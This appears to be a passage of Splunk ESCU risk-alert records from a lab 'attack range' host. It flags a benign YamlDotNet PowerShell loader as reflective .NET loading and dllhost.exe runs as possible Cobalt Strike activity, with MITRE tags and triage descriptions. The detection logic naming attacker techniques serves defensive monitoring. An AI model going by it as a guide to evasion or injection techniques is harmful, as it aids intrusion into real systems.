EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664776800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664776800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1104", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664776800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664776800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x450", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664773200, search_name="ESCU - DLLHost with no Command Line Arguments with Network - Rule", C2="0:0:0:0:0:0:0:1", orig_time="1664773200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_image\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", dest="win-dc-mhaag-attack-range-622.attackrange.local", dest_port="6001", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5000", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="The process dllhost.exe was spawned by $parent_image$ without any command-line arguments on win-dc-mhaag-attack-range-622.attackrange.local by $user$.", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="dllhost.exe", threat_object_type="process" 1664780132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664780132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664780132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664780132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664773200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664773200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5000", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664773200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664773200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1388", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on 